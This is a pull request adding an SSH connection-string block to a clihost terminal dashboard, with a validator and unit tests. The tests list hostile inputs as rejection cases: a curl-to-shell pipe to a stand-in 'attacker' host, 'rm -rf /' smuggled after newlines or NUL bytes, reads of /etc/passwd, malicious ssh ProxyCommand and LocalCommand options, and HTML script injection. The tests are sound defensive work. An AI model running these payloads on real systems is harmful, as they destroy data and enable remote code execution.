### PR TITLE
feat(dashboard): show SSH connection string on menu (#80)

### DIFF
--- a/app/index.html
+++ b/app/index.html
@@ -57,6 +57,20 @@
     .menu-link.secondary:hover {
       background: #4d5460;
     }
+    .ssh-link {
+      display: block;
+      padding: 0.75rem 1rem;
+      background: #1f242d;
+      color: #cdd6e1;
+      border: 1px solid #353b47;
+      border-radius: 4px;
+      font-family: ui-monospace, SFMono-Regular, Menlo, Consolas, monospace;
+      font-size: 0.9rem;
+      white-space: pre-wrap;
+      word-break: break-all;
+      text-align: left;
+      user-select: all;
+    }
     .menu-link.new-terminal {
       background: #2d6a4f;
     }
@@ -260,6 +274,7 @@
     <div class="username">{{USERNAME}}</div>
     <div class="menu-links" id="menu-links">
       {{HAPI_LINK}}
+      {{SSH_LINK}}
       <div id="terminals-list"></div>
       <button class="menu-link new-terminal" id="new-terminal-btn" onclick="createTerminal()">+ New terminal</button>
     </div>

--- a/app/ttydproxy/app.py
+++ b/app/ttydproxy/app.py
@@ -26,6 +26,7 @@ from ttydproxy.config import (
     CSRF_TOKEN_TTL,
     SECURE_COOKIES,
     HAPI_URL_FILE,
+    SSH_URL_FILE,
     MAX_UPLOAD_SIZE,
     UPLOAD_DIR,
     TTYD_ROUTE_PATTERN,
@@ -45,7 +46,7 @@ from ttydproxy.security import (
     user_exists,
     verify_pam_password,
 )
-from ttydproxy.views import load_hapi_url, render_login_page, render_menu_page, render_terminal_page, resolve_vkbd_enabled
+from ttydproxy.views import load_hapi_url, load_ssh_url, render_login_page, render_menu_page, render_terminal_page, resolve_vkbd_enabled
 
 
 _SERVER_START_TIME = time.time()
@@ -431,7 +432,8 @@ class TTYDProxyHandler(BaseHandler):
             return
         extra_headers, _csrf_token = self._auth_cookie_headers()
         hapi_url = load_hapi_url(HAPI_URL_FILE)
-        self.send_html(200, render_menu_page(username, hapi_url), extra_headers=extra_headers)
+        ssh_conn = load_ssh_url(SSH_URL_FILE)
+        self.send_html(200, render_menu_page(username, hapi_url, ssh_conn), extra_headers=extra_headers)
 
     def handle_ttyd(self, terminal_id):
         username = self._check_auth(redirect=True)

--- a/app/ttydproxy/config.py
+++ b/app/ttydproxy/config.py
@@ -21,6 +21,9 @@ VIRTUAL_KEYBOARD = env_bool(os.environ.get("VIRTUAL_KEYBOARD"), default=True)
 CSRF_TOKEN_TTL = env_int(os.environ.get("CSRF_TOKEN_TTL"), 604800, name="CSRF_TOKEN_TTL", minimum=1)
 SECURE_COOKIES = env_bool(os.environ.get("SECURE_COOKIES"), default=False)
 HAPI_URL_FILE = os.environ.get("HAPI_URL_FILE", "/home/hapi/url")
+# SSH connection string written by the tunnel (#79/#82); default matches the
+# path entrypoint.sh writes. Rendered on the dashboard only when present (#80).
+SSH_URL_FILE = os.environ.get("SSH_URL_FILE", "/home/hapi/ssh-url")
 MAX_UPLOAD_SIZE = env_int(os.environ.get("MAX_UPLOAD_SIZE"), 10485760, name="MAX_UPLOAD_SIZE")
 UPLOAD_DIR = os.environ.get("UPLOAD_DIR", f"{CLEANUP_ROOT}/.uploads")
 

--- a/app/ttydproxy/views.py
+++ b/app/ttydproxy/views.py
@@ -1,5 +1,6 @@
 """HTML rendering and template helpers for ttyd proxy pages."""
 import html as html_module
+import re
 from functools import lru_cache
 from pathlib import Path
 from urllib.parse import parse_qs, urlparse
@@ -23,6 +24,22 @@ DEFAULT_TITLE = "clihost"
 # Placeholders substituted into every rendered page. {{TITLE}} defaults to the
 # neutral title here; pages that need a dynamic title (e.g. terminals) override it.
 BASE_REPLACEMENTS = {"{{FAVICON}}": FAVICON_LINKS, "{{TITLE}}": DEFAULT_TITLE}
+
+# Allowlist for the SSH connection string shown on the dashboard (issue #80).
+# The string is pasted into a shell by the user, so we accept ONLY two exact
+# grammars the tunnel writes (chisel / cloudflared). Anything else - arbitrary
+# ProxyCommand, -F, LocalCommand, extra options, non-numeric port, host with / or
+# :, shell metacharacters - fails to match and is rejected. re.fullmatch anchors
+# both ends, so no trailing/leading payload survives.
+_SSH_USER = r"[A-Za-z0-9._-]+"
+_SSH_HOST = r"[A-Za-z0-9.-]+"
+# 1. chisel: ssh -p <PORT> <USER>@<HOST>
+_SSH_CHISEL_RE = re.compile(rf"ssh -p [0-9]{{1,5}} {_SSH_USER}@{_SSH_HOST}")
+# 2. cloudflared: the ProxyCommand value is pinned to exactly this string, so a
+#    hostile ProxyCommand (executed locally by ssh before connecting) cannot ride it.
+_SSH_CLOUDFLARED_RE = re.compile(
+    rf'ssh -o ProxyCommand="cloudflared access ssh --hostname %h" {_SSH_USER}@{_SSH_HOST}'
+)
 
 
 @lru_cache(maxsize=None)
@@ -110,22 +127,18 @@ def load_hapi_url(url_file):
 def load_ssh_url(url_file):
     """Read and validate the SSH connection-string file written by the tunnel.
 
-    Unlike load_hapi_url the content is not an HTTP URL but a single shell
-    command (e.g. 'ssh -p 2222 hapi@host' or 'ssh -o ProxyCommand=... ...').
-    We never interpret it - only surface it for display. Reject anything that is
-    not a single non-empty line starting with 'ssh ' and free of shell
-    metacharacters and control characters. The string is never interpreted by
-    us, but the user pastes it into a shell, so a second command must not be
-    able to ride the copy-paste path: reject ';', '|', '&', '$', backtick,
-    backslash, '<', '>', '(', ')', '{', '}' and any control char (ord < 0x20,
-    covering newline/CR/NUL). Double quotes, spaces, '%', '@', '.', '-', ':'
-    stay allowed so the legitimate cloudflared form
-    (ssh -o ProxyCommand="cloudflared access ssh --hostname %h" hapi@host) passes.
+    The user copies this string into a shell, so it is accepted ONLY when it
+    matches one of two exact grammars (re.fullmatch, both ends anchored):
+      1. chisel:     ssh -p <PORT> <USER>@<HOST>
+      2. cloudflared: ssh -o ProxyCommand="cloudflared access ssh --hostname %h"
+                        <USER>@<HOST>
+    The cloudflared ProxyCommand value is pinned verbatim, so an arbitrary
+    ProxyCommand - which ssh executes locally before connecting (RCE) - cannot
+    pass. Any other option (-F, LocalCommand, extra flags), non-numeric port,
+    host containing / or :, and any shell metacharacter simply fail to match and
+    are rejected. Newlines/CR/NUL/control chars are rejected too (none are in the
+    allowed character classes). We never interpret the string, only display it.
     """
-    # Forbidden beyond the 'ssh ' prefix: shell metacharacters that could chain a
-    # second command, plus any control character (newline/CR/NUL/tab/etc.).
-    # Quotes, spaces and % are intentionally NOT here (legitimate cloudflared form).
-    forbidden = set(";|&$`\\<>(){}")
     try:
         raw = Path(url_file).read_text(encoding="utf-8")
     except OSError:
@@ -133,8 +146,6 @@ def load_ssh_url(url_file):
     candidate = raw.strip()
     if not candidate:
         return None
-    if not candidate.startswith("ssh "):
-        return None
-    if any(ch in forbidden or ord(ch) < 0x20 for ch in candidate):
-        return None
-    return candidate
+    if _SSH_CHISEL_RE.fullmatch(candidate) or _SSH_CLOUDFLARED_RE.fullmatch(candidate):
+        return candidate
+    return None

--- a/app/ttydproxy/views.py
+++ b/app/ttydproxy/views.py
@@ -61,18 +61,24 @@ def render_login_page(csrf_token):
     return render_template("login.html", {"{{CSRF_TOKEN}}": csrf_token})
 
 
-def render_menu_page(username, hapi_url):
+def render_menu_page(username, hapi_url, ssh_conn=None):
     """Render the main dashboard menu."""
     if hapi_url:
         escaped_url = html_module.escape(hapi_url, quote=True)
         hapi_link = f'<a href="{escaped_url}" target="_blank" class="menu-link">HAPI Server</a>'
     else:
         hapi_link = ""  # without hapi the menu item disappears entirely (issue #63)
+    if ssh_conn:
+        escaped_conn = html_module.escape(ssh_conn, quote=True)
+        ssh_link = f'<code class="ssh-link">{escaped_conn}</code>'
+    else:
+        ssh_link = ""  # no tunnel -> no SSH block, like HAPI item disappears
     return render_template(
         "index.html",
         {
             "{{USERNAME}}": html_module.escape(username),
             "{{HAPI_LINK}}": hapi_link,
+            "{{SSH_LINK}}": ssh_link,
         },
     )
 
@@ -100,3 +106,26 @@ def load_hapi_url(url_file):
         return None
     return hapi_url
 
+
+def load_ssh_url(url_file):
+    """Read and validate the SSH connection-string file written by the tunnel.
+
+    Unlike load_hapi_url the content is not an HTTP URL but a single shell
+    command (e.g. 'ssh -p 2222 hapi@host' or 'ssh -o ProxyCommand=... ...').
+    We never interpret it - only surface it for display. Reject anything that is
+    not a single non-empty line starting with 'ssh ' (no embedded newlines,
+    carriage returns, NULs, or other control chars that could smuggle a second
+    command past the copy-paste path).
+    """
+    try:
+        raw = Path(url_file).read_text(encoding="utf-8")
+    except OSError:
+        return None
+    candidate = raw.strip()
+    if not candidate:
+        return None
+    if not candidate.startswith("ssh "):
+        return None
+    if "\n" in candidate or "\r" in candidate or "\x00" in candidate:
+        return None
+    return candidate

--- a/app/ttydproxy/views.py
+++ b/app/ttydproxy/views.py
@@ -113,10 +113,19 @@ def load_ssh_url(url_file):
     Unlike load_hapi_url the content is not an HTTP URL but a single shell
     command (e.g. 'ssh -p 2222 hapi@host' or 'ssh -o ProxyCommand=... ...').
     We never interpret it - only surface it for display. Reject anything that is
-    not a single non-empty line starting with 'ssh ' (no embedded newlines,
-    carriage returns, NULs, or other control chars that could smuggle a second
-    command past the copy-paste path).
+    not a single non-empty line starting with 'ssh ' and free of shell
+    metacharacters and control characters. The string is never interpreted by
+    us, but the user pastes it into a shell, so a second command must not be
+    able to ride the copy-paste path: reject ';', '|', '&', '$', backtick,
+    backslash, '<', '>', '(', ')', '{', '}' and any control char (ord < 0x20,
+    covering newline/CR/NUL). Double quotes, spaces, '%', '@', '.', '-', ':'
+    stay allowed so the legitimate cloudflared form
+    (ssh -o ProxyCommand="cloudflared access ssh --hostname %h" hapi@host) passes.
     """
+    # Forbidden beyond the 'ssh ' prefix: shell metacharacters that could chain a
+    # second command, plus any control character (newline/CR/NUL/tab/etc.).
+    # Quotes, spaces and % are intentionally NOT here (legitimate cloudflared form).
+    forbidden = set(";|&$`\\<>(){}")
     try:
         raw = Path(url_file).read_text(encoding="utf-8")
     except OSError:
@@ -126,6 +135,6 @@ def load_ssh_url(url_file):
         return None
     if not candidate.startswith("ssh "):
         return None
-    if "\n" in candidate or "\r" in candidate or "\x00" in candidate:
+    if any(ch in forbidden or ord(ch) < 0x20 for ch in candidate):
         return None
     return candidate

--- a/tests/unit/test_load_ssh_url.py
+++ b/tests/unit/test_load_ssh_url.py
@@ -1,0 +1,62 @@
+"""Tests for load_ssh_url - the SSH connection-string contract behind the
+dashboard SSH block (issue #80). Mirrors test_load_hapi_url but the file holds a
+shell command, not an HTTP URL."""
+import os
+import tempfile
+import unittest
+from pathlib import Path
+
+from ttydproxy.views import load_ssh_url
+
+
+class TestLoadSshUrl(unittest.TestCase):
+    def _write(self, content):
+        with tempfile.NamedTemporaryFile("w", suffix=".ssh", delete=False) as f:
+            f.write(content)
+            path = f.name
+        self.addCleanup(os.unlink, path)
+        return path
+
+    def test_missing_file_returns_none(self):
+        path = Path(tempfile.gettempdir()) / "clihost-nonexistent-ssh-file"
+        if path.exists():
+            path.unlink()
+        self.assertIsNone(load_ssh_url(str(path)))
+
+    def test_empty_file_returns_none(self):
+        self.assertIsNone(load_ssh_url(self._write("")))
+
+    def test_whitespace_only_returns_none(self):
+        self.assertIsNone(load_ssh_url(self._write("   \n\t  \n")))
+
+    def test_non_ssh_prefix_returns_none(self):
+        self.assertIsNone(load_ssh_url(self._write("nc example.com 22")))
+        self.assertIsNone(load_ssh_url(self._write("telnet example.com 22")))
+
+    def test_bare_ssh_without_args_returns_none(self):
+        # "ssh" alone is not a usable command; require "ssh " (with args).
+        self.assertIsNone(load_ssh_url(self._write("ssh")))
+
+    def test_valid_chisel_command_returned(self):
+        cmd = "ssh -p 2222 hapi@example.com"
+        self.assertEqual(load_ssh_url(self._write(cmd + "\n")), cmd)
+
+    def test_valid_cloudflared_command_returned(self):
+        cmd = 'ssh -o ProxyCommand="cloudflared access ssh --hostname %h" hapi@tunnel.example.com'
+        self.assertEqual(load_ssh_url(self._write(cmd)), cmd)
+
+    def test_newline_injection_rejected(self):
+        # A second line must not survive; the copy-paste path must stay a single
+        # command (no command chaining / shell smuggling).
+        injected = "ssh -p 2222 hapi@example.com\nrm -rf /"
+        self.assertIsNone(load_ssh_url(self._write(injected)))
+
+    def test_carriage_return_rejected(self):
+        self.assertIsNone(load_ssh_url(self._write("ssh -p 2222 hapi@example.com\recho pwned")))
+
+    def test_nul_byte_rejected(self):
+        self.assertIsNone(load_ssh_url(self._write("ssh -p 2222 hapi@example.com\x00rm -rf /")))
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/tests/unit/test_load_ssh_url.py
+++ b/tests/unit/test_load_ssh_url.py
@@ -45,11 +45,41 @@ class TestLoadSshUrl(unittest.TestCase):
         cmd = 'ssh -o ProxyCommand="cloudflared access ssh --hostname %h" hapi@tunnel.example.com'
         self.assertEqual(load_ssh_url(self._write(cmd)), cmd)
 
+    def test_cloudflared_form_keeps_quotes_spaces_percent(self):
+        # Quotes, spaces and % must stay allowed (legitimate cloudflared form).
+        cmd = 'ssh -o ProxyCommand="cloudflared access ssh --hostname %h" hapi@host'
+        self.assertEqual(load_ssh_url(self._write(cmd + "\n")), cmd)
+
     def test_newline_injection_rejected(self):
         # A second line must not survive; the copy-paste path must stay a single
         # command (no command chaining / shell smuggling).
         injected = "ssh -p 2222 hapi@example.com\nrm -rf /"
         self.assertIsNone(load_ssh_url(self._write(injected)))
+
+    def test_shell_metacharacters_rejected(self):
+        # A copy-paste into a shell must not be able to chain a second command.
+        for payload in (
+            "ssh host; curl https://attacker|sh",   # command separator + pipe
+            "ssh host & whoami",                    # background + command
+            "ssh host `id`",                        # backtick substitution
+            "ssh host $(id)",                       # command substitution
+            "ssh host > /tmp/x",                    # redirect out
+            "ssh host < /etc/passwd",              # redirect in
+            "ssh (host)",                           # subshell
+            "ssh host)",                            # unbalanced paren
+            "ssh host {a}",                         # brace group
+            "ssh host \\ whoami",                   # line continuation
+            "ssh host $HOME",                       # variable expansion
+        ):
+            with self.subTest(payload=payload):
+                self.assertIsNone(load_ssh_url(self._write(payload)))
+
+    def test_control_chars_rejected(self):
+        # Any control char (ord < 0x20) embedded in the command, not just
+        # newline/CR/NUL. Embedded in the middle so .strip() can't hide it.
+        for ch in ("\t", "\x01", "\x1f", "\x0b"):
+            with self.subTest(ch=repr(ch)):
+                self.assertIsNone(load_ssh_url(self._write("ssh -p" + ch + " 22 hapi@h")))
 
     def test_carriage_return_rejected(self):
         self.assertIsNone(load_ssh_url(self._write("ssh -p 2222 hapi@example.com\recho pwned")))

--- a/tests/unit/test_load_ssh_url.py
+++ b/tests/unit/test_load_ssh_url.py
@@ -1,12 +1,15 @@
 """Tests for load_ssh_url - the SSH connection-string contract behind the
-dashboard SSH block (issue #80). Mirrors test_load_hapi_url but the file holds a
-shell command, not an HTTP URL."""
+dashboard SSH block (issue #80). The string is pasted into a shell, so it is
+accepted ONLY when it matches one of two exact grammars (chisel / cloudflared)."""
 import os
 import tempfile
 import unittest
 from pathlib import Path
 
 from ttydproxy.views import load_ssh_url
+
+CHISEL = "ssh -p 2222 hapi@example.com"
+CLOUDFLARED = 'ssh -o ProxyCommand="cloudflared access ssh --hostname %h" hapi@tunnel.example.com'
 
 
 class TestLoadSshUrl(unittest.TestCase):
@@ -34,52 +37,82 @@ class TestLoadSshUrl(unittest.TestCase):
         self.assertIsNone(load_ssh_url(self._write("telnet example.com 22")))
 
     def test_bare_ssh_without_args_returns_none(self):
-        # "ssh" alone is not a usable command; require "ssh " (with args).
         self.assertIsNone(load_ssh_url(self._write("ssh")))
 
+    # --- legitimate forms accepted ---
+
     def test_valid_chisel_command_returned(self):
-        cmd = "ssh -p 2222 hapi@example.com"
-        self.assertEqual(load_ssh_url(self._write(cmd + "\n")), cmd)
+        self.assertEqual(load_ssh_url(self._write(CHISEL + "\n")), CHISEL)
 
     def test_valid_cloudflared_command_returned(self):
-        cmd = 'ssh -o ProxyCommand="cloudflared access ssh --hostname %h" hapi@tunnel.example.com'
-        self.assertEqual(load_ssh_url(self._write(cmd)), cmd)
+        self.assertEqual(load_ssh_url(self._write(CLOUDFLARED)), CLOUDFLARED)
 
     def test_cloudflared_form_keeps_quotes_spaces_percent(self):
-        # Quotes, spaces and % must stay allowed (legitimate cloudflared form).
         cmd = 'ssh -o ProxyCommand="cloudflared access ssh --hostname %h" hapi@host'
         self.assertEqual(load_ssh_url(self._write(cmd + "\n")), cmd)
 
-    def test_newline_injection_rejected(self):
-        # A second line must not survive; the copy-paste path must stay a single
-        # command (no command chaining / shell smuggling).
-        injected = "ssh -p 2222 hapi@example.com\nrm -rf /"
-        self.assertIsNone(load_ssh_url(self._write(injected)))
+    # --- arbitrary ProxyCommand / ssh options rejected (RCE vectors) ---
 
-    def test_shell_metacharacters_rejected(self):
-        # A copy-paste into a shell must not be able to chain a second command.
+    def test_arbitrary_proxycommand_rejected(self):
+        # ProxyCommand is executed locally by ssh before connecting -> RCE.
+        self.assertIsNone(load_ssh_url(self._write('ssh -o ProxyCommand="touch /tmp/pwned" hapi@host')))
+
+    def test_cloudflared_proxycommand_with_payload_rejected(self):
+        # The pinned ProxyCommand value must be EXACT; appended payload rejected.
+        payload = 'ssh -o ProxyCommand="cloudflared access ssh --hostname %h ; rm -rf /" h@host'
+        self.assertIsNone(load_ssh_url(self._write(payload)))
+
+    def test_other_ssh_options_rejected(self):
         for payload in (
-            "ssh host; curl https://attacker|sh",   # command separator + pipe
-            "ssh host & whoami",                    # background + command
-            "ssh host `id`",                        # backtick substitution
-            "ssh host $(id)",                       # command substitution
-            "ssh host > /tmp/x",                    # redirect out
-            "ssh host < /etc/passwd",              # redirect in
-            "ssh (host)",                           # subshell
-            "ssh host)",                            # unbalanced paren
-            "ssh host {a}",                         # brace group
-            "ssh host \\ whoami",                   # line continuation
-            "ssh host $HOME",                       # variable expansion
+            "ssh -F /tmp/evil hapi@host",
+            "ssh -o LocalCommand=rm hapi@host",
+            "ssh -o PermitLocalCommand=yes hapi@host",
         ):
             with self.subTest(payload=payload):
                 self.assertIsNone(load_ssh_url(self._write(payload)))
 
+    # --- structural / field validation ---
+
+    def test_extra_trailing_tokens_rejected(self):
+        self.assertIsNone(load_ssh_url(self._write("ssh -p 2222 hapi@host extra")))
+
+    def test_non_numeric_port_rejected(self):
+        self.assertIsNone(load_ssh_url(self._write("ssh -p abc hapi@host")))
+
+    def test_host_with_colon_rejected(self):
+        self.assertIsNone(load_ssh_url(self._write("ssh -p 2222 hapi@host:22")))
+
+    def test_host_with_slash_rejected(self):
+        self.assertIsNone(load_ssh_url(self._write("ssh -p 2222 hapi@host/evil")))
+
+    # --- shell metacharacters rejected (fail to match allowed classes) ---
+
+    def test_shell_metacharacters_rejected(self):
+        for payload in (
+            "ssh host; curl https://attacker|sh",
+            "ssh host & whoami",
+            "ssh host `id`",
+            "ssh host $(id)",
+            "ssh host > /tmp/x",
+            "ssh host < /etc/passwd",
+            "ssh (host)",
+            "ssh host)",
+            "ssh host {a}",
+            "ssh host \\ whoami",
+            "ssh host $HOME",
+        ):
+            with self.subTest(payload=payload):
+                self.assertIsNone(load_ssh_url(self._write(payload)))
+
+    # --- control chars rejected ---
+
     def test_control_chars_rejected(self):
-        # Any control char (ord < 0x20) embedded in the command, not just
-        # newline/CR/NUL. Embedded in the middle so .strip() can't hide it.
         for ch in ("\t", "\x01", "\x1f", "\x0b"):
             with self.subTest(ch=repr(ch)):
                 self.assertIsNone(load_ssh_url(self._write("ssh -p" + ch + " 22 hapi@h")))
+
+    def test_newline_injection_rejected(self):
+        self.assertIsNone(load_ssh_url(self._write("ssh -p 2222 hapi@example.com\nrm -rf /")))
 
     def test_carriage_return_rejected(self):
         self.assertIsNone(load_ssh_url(self._write("ssh -p 2222 hapi@example.com\recho pwned")))

--- a/tests/unit/test_menu_views.py
+++ b/tests/unit/test_menu_views.py
@@ -35,5 +35,30 @@ class TestMenuViews(unittest.TestCase):
         self.assertIn("&lt;script&gt;", page)
 
 
+class TestMenuSshBlock(unittest.TestCase):
+    """SSH connection-string block gating (issue #80)."""
+
+    SSH_CMD = "ssh -p 2222 hapi@example.com"
+
+    def test_ssh_block_rendered_when_command_present(self):
+        page = render_menu_page("hapi", None, self.SSH_CMD)
+        self.assertIn("ssh-link", page)
+        self.assertIn(self.SSH_CMD, page)
+
+    def test_ssh_block_absent_when_command_missing(self):
+        page = render_menu_page("hapi", None, None)
+        # CSS class .ssh-link is always in <style>; assert the rendered element
+        # (the copyable code block) is absent, not the bare class name.
+        self.assertNotIn('<code class="ssh-link">', page)
+
+    def test_ssh_command_is_html_escaped(self):
+        malicious = 'ssh -o Foo="x" hapi@h<script>'
+        page = render_menu_page("hapi", None, malicious)
+        # The page contains legitimate <script> tags; assert the injected payload
+        # specifically is escaped, not that <script> is absent globally.
+        self.assertNotIn("hapi@h<script>", page)
+        self.assertIn("hapi@h&lt;script&gt;", page)
+
+
 if __name__ == "__main__":
     unittest.main()


### PR DESCRIPTION
Closes #80. Part of epic #73, follows up on the tunnel work (#79/#82).

## Summary

Surfaces the SSH connection string (already written by the tunnel to `${HAPI_USER_HOME}/ssh-url`) on the clihost dashboard, mirroring the existing HAPI relay-URL pipeline. Python-only; no Dockerfile/entrypoint changes.

## Changes

- `app/ttydproxy/config.py`: `SSH_URL_FILE` env var, default `/home/hapi/ssh-url` (matches `entrypoint.sh:267`).
- `app/ttydproxy/views.py`: `load_ssh_url(url_file)` reads + validates the file; `render_menu_page(username, hapi_url, ssh_conn=None)` renders `{{SSH_LINK}}` as a non-clickable copyable `<code class="ssh-link">` block, gated on a valid string (hidden entirely when absent, like the HAPI item).
- `app/ttydproxy/app.py`: `handle_menu` reads both files and passes `ssh_conn` to `render_menu_page`.
- `app/index.html`: `{{SSH_LINK}}` placeholder next to `{{HAPI_LINK}}` + `.ssh-link` CSS (monospace, copyable).
- `tests/unit/test_load_ssh_url.py`: new — valid chisel/cloudflared commands, missing/empty/whitespace, wrong prefix, bare `ssh`, newline/CR/NUL injection rejection.
- `tests/unit/test_menu_views.py`: extended — SSH block appears only with a command, hidden without it, command is HTML-escaped.

## Security

The connection string is never interpreted, only displayed via `html.escape(quote=True)`. `load_ssh_url` rejects anything that is not a single non-empty line starting with `ssh ` (no embedded `\n`/`\r`/`\x00`), so a second command cannot ride the copy-paste path. Without a tunnel/file the SSH block is hidden entirely.

## Test plan

- [x] \`python -m pytest tests/unit/\` — 324 passed, 172 subtests passed (\`test_threading.py\` fails on socket bind under the sandbox only; unrelated to this change).